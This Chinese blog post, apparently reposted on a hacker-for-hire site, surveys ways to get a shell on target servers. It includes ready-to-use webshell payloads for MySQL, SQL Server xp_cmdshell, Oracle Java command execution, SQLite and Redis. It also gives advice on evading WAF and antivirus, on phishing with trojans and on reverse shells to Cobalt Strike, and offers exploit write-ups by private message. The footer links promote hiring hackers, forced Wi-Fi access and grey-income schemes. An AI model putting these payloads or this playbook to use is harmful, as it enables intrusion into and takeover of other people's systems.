渗透测试详解技术教程

访客4年前关于黑客接单827

  无论是常规渗透测试还是攻防对抗,亦或黑灰产对抗、APT攻击,getshell 是一个从内到外的里程碑成果。我们接下来总结下常见拿shell的一些思路和 *** 。文中可能有一些不足之处,还望大佬不吝赐教。

  

  一般前提条件:有权限、知道路径

  mysql

  select 0x3c3f70687020a6576616c28245f504f53545b615d293ba3f3e into outfile '/var/www/html/1.php'

  Sql server

  存储过程xp_cmdshell

  ;exec master..xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > D:\WWW\2333.aspx' ;--

  Oracle

  1、创建JAVA包

  select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader=new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp=myReader.readLine()) !=null) str +=stemp+"n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual;

  2、JAVA权限

  select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''begin dbms_java.grant_permission( ''''SYSTEM'''', ''''SYS:java.io.FilePermission'''', '''''''',''''EXECUTE'''');end;''commit;end;') from dual;

  3、创建函数

  select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual;

  URL执行

  id=602'||utl_inadd.get_host_name((select LinxRUNCMD('cmd /c dir d:/') from dual))--

  postgresql

  COPY (select '') to '/tmp/1.php';

  sqlite3

  ;attach database 'D:\www\008.php' as tt;create TABLE tt.exp (dataz text) ; insert INTO tt.exp (dataz) VALUES (x'3c3f70687020406576616c28245f504f53545b27636d64275d293b3f3e');

  redis

  %0D%0Aconfig%20set%20dir%20%2Fvar%2Fwww%2Fhtml2F%0D%0Aconfig%20set%20dbfilename%20shell%2Ephp%0D%0Aset%20x%2022%3C%3Fphp%20phpinfo%28%29%3B%%203F%3E%22%0D%0Asave%0D%0A

  PS:oracle成功率受限于与数据库版本以及注入点

  当然注入不一定都能拿到webshell,比如站库分离。但不管是否站库分离,只要权限够能够执行系统命令,反弹cmdshell 也是不错的选择。比如sa权限结合xp_cmdshell 存储过程,直接执行powershell,反弹到cobalt strike …

  上传漏洞对于getshell 还是高频的,无论是前台上传点,还是后台(通过口令进入、或者XSS到后台、逻辑漏洞越权)上传点,当然也有可能要结合一些Web Server的解析漏洞。但像IIS和apache解析漏洞因为太老,现在成功概率都小很多。

  类似直接的上传漏洞就可以getshell的漏洞,例如IIS PUT上传、Tomcat PUT 上传,因为落脚点最终都跟上传有关系,这个就不单独去枚举。

  还有一批像一些编辑器(FCK、editor、CKedtor…)存在上传漏洞可以getshell。这一系列,一般是基于信息收集确定是否存在漏洞,然后进一步利用。(发现漏洞比利用漏洞更艺术)

  这个期间可能涉及逻辑绕过、WAF对抗、杀软绕过、执行层,主要解决四点:

  代码或逻辑问题,可以上传脚本文件

  躲过WAF对脚本文件及上传内容的校验

  解决落地杀

  执行过程,躲过流量监控或者系统层监控

  同样RCE 也需要关注以上后几点,因为前面的入口场景不同。

  RCE是统称,包括远程代码执行、远程命令执行。当然这两个概念还是有意思的,比如struts2漏洞有的叫命令执行有的叫代码执行。这都不重要。一般根据触发点来命名。

  Java系的OGNL 表达式注入、EL注入、反序列化

  PHP系列的eval 类、伪协议类 代码执行、system类命令执行

  当然反序列化漏洞基本上编程语言都有,除了漏洞利用getshell,用作免杀后门webshell也是一个不错的思路推荐。

  正由于代码执行的部分结果是执行了系统命令,在命令执行的加持下,可以直接拿到应用或系统的shell,也是正统策略。

  根据《2019年Web应用安全年度报告》,高频系列27个漏洞漏洞(这些漏洞都值得深入分析及利用),大部分为远程代码执行,同时RCE系列,Java 组件也占比更大。

  

  列表如下:

  Harbor API SQL注入(CVE-2019-19026/CVE-2019-19029)

  Thinkcmf任意内容包含远程代码执行

  泛微E-cology OA数据库配置信息泄漏

  Fastjson远程拒绝服务

  GhostScript远程代码执行(CVE-2019-14811)

  泛微E-cology OA系统远程代码执行

  Apache Solr远程代码执行(CVE-2019-0193)

  FasterXML jackson-databind远程代码执行(CVE-2019-14439)

  FasterXML jackson-databind远程代码执行(CVE-2019-12384)

  FasterXML jackson-databind远程代码执行(CVE-2019-14379)

  Xstream远程代码执行(CVE-2019-10173)

  致远OA A8前台getshell

  Apache axis远程代码执行

  Weblogic远程代码执行(CVE-2019-2729)

  Weblogic远程代码执行(CVE-2019-2725)

  Confluence远程代码执行(CVE-2019-3398)

  Confluence远程代码执行(CVE-2019-3396)

  Ruby On Rails任意文件读取(CVE-2019-5418)

  Jenkins远程代码执行(CVE-2019-1003030)

  ColdFusion远程代码执行(CVE-2019-7091)

  Spring Boot Actuator远程代码执行

  Drupal8 REST Module远程代码执行(CVE-2019-6340)

  Jenkins远程代码执行(CVE-2019-1003000)

  Apache Solr远程代码执行(CVE-2019-17558)

  Fastjson远程代码执行

  Jenkins远程代码执行(CVE-2019-1003000)

  以上漏洞利用总结,可私M

  文件包含,常见 *** P、ASPx、PHP 都有包含,但主要还是PHP的包含好用。因为可以包含任意路径的任意后缀,能控制include类函数的输入结合系统特性文件或者上传的文件结合,可以拿到webshell。

   *** P包含,默认情况下动态包含WEB路径下的 *** P文件(静态包含可以包含任意后缀的文本文件,但不支持变量动态赋值暂不说明),2月份的CVE-2020-1938 Tomcat 文件包含漏洞,这个漏洞看上去是包含了任意格式的文件,但其实是因为AJP协议。

  更多文件包含冷知识,参考 原贴

  口令猜测是门艺术活,进入后台多种漏洞的利用,包括前面提到的漏洞常见高危系列,还有一些备份还原、导入导出、 模板编辑等功能。

  登录逻辑绕过、越权类,搞定后台。进行典型漏洞利用

  通过XSS钓到cookie,或者利用CSRF类漏洞“借刀杀人”搞到后台权限。进行典型漏洞利用。

  网站后台Getshell的 *** 总结

  XXE漏洞,最理想的状态就是直接可以代码执行(类似PHP expert);大多数还是以文件读取信息收集为主,结合源码或者配置文件(例如/etc/shadow、tomcat-users.xml等)getshell;还可以通过XXE的SSRF进行隔山打牛式getshell。

  当然对于漏洞挖掘来讲,无论是xml格式还是json格式的POST数据包都值得多关注下。说不定就有惊喜呢。

  原理上SSRF可以结合所有RCE(反序列化、s2、mysql … ;github 搜索SSRFmap、ssrf_proxy)的漏洞进行组合利用,只是我们在平常实例角度用SSRF+redis未授权用的多一些。

  正常的一般是通过读取web.xml 获取class文件,然后反编译,找到代码的一些漏洞。进而拿到系统的权限。当然还有文件读取加文件上传的曲折配合(任意文件读取漏洞的曲折历程)

  暴力破解的艺术,毕竟锤子开锁和要是开锁在入侵角度结果是一样的。

  常规协议:SSH、RDP、 *** B、VPC、Redis 等中间件类

  通过数据库执行语句获得了系统shell,对于获取权限,比sql注入更直接。

  设备层:VPN、防火墙,搞定这种边界设备,单车变摩托。

  发送钓鱼邮件,捆绑的马,访问即加载、点击即执行类的马。

  这一类攻击一般结合社工,例如借用IT管理员发送或某领导的账号去发送(所以这时候的邮箱的0day就灰常重要了,当然如果在邮箱内部找到类似VPN或者密码表类,也不需要这么麻烦,一把梭…),可信度就高很多。对于红队来讲,钓的鱼儿还是以IT部门系列为主,普通办公区的主机权限还需要做更多的工作。

  拼信息收集,漏洞点,别人找不到,我找的到(例如移动端、物联网等接口信息,当然这种shell,一般距离核心应用可能也远一些);

  拼利用速度,自动化一条龙(基本属于日常漏洞和工程化的积累);

  拼0day (VPN --- Mail --- OA --- java组件 --- CMS --- 关键设备 );

  拼细节漏洞,组合利用。(这是一篇“不一样”的真实渗透测试案例分析文章 )

  以上为本次所感所想,当然除了这种按照漏洞类型大类去分类,还有一些具体的漏洞也可以直接getshell,本次分析意义,就是在没有思路的时候,有个相对体系性思考框架。毕竟储备充足才会看上去像运气一样水到渠成,其实都是局部真相。

  

  Getshell姿势文章大 ***

  Author: *** 0nk@深蓝攻防实验室

  如有侵权,请联系删除

相关文章

BI分析系统概述

BI分析系统概述

编辑导语:BI阐明是当今数据时代必不行少的本领之一,通过系统化产物化的要领,可以或许大幅低落数据的获取本钱、晋升数据利用效率;借助可视化、交互式的操纵,可以高效支持业务的阐明及成长。本文作者对此举办了...

看电影的网站有哪些?什么网站看电影比较好

看电影的网站有哪些?什么网站看电影比较好

大家晚上好啊,这个点你们都在干什么呢?是在追剧,还是照顾孩子,看小说呢?如果追剧的话,你一定要收藏这4个看电影超赞的在线电影网站,因为资源很丰富!不知道会很可惜哦! 1. 看看屋 听着名字是不是有...

去哪里找黑客协助-手机强行毗邻wifi密码黑客(如何强行毗邻别人家的w

网络黑客比强台风哪些時刻竣事 网络黑客种植大户每天都再发30块到(网络黑客大户追款流程) 有哪些有关网络黑客的娱乐节目 网络黑客自学教程如何定位(网站渗透自学教程) 怎祥做一个通俗...

黑客接单入侵服务器_找黑客找密码怎么办

而在盯梢蓝宝菇的进犯活动中,该安排投进的LNK文件在方针途径字符串前面填充了很多的空字符,直接检查无法清晰其履行的内容,需求解析LNK文件结构获取。 SetSpawningHostId(int32...

化妆品如何推广活动(新化妆品品牌推广5个技巧

化妆品如何推广活动(新化妆品品牌推广5个技巧

在各行各业竞争激烈的互联网时代,企业想要获取用户,只有让用户知道你,选择你,只有把自己的品牌做进用户心中,才能稳赢!那么在人人都与互联网分不开的现在,化妆品行业如何通过网络为企业做品牌宣传,将产品销售...

灰色收入一天赚一万(揭秘一个日赚千元的灰色

灰色收入一天赚一万(揭秘一个日赚千元的灰色

文/鲨鱼风暴思维 ▶免费领取下面项目&hellip;… ▶一部手机从0赚到1200元的过程 发送鲨鱼01领取 ▶实战总结:每日引流上千好友 发送鲨鱼02领取 ▶不推广不卖产品,月入五千...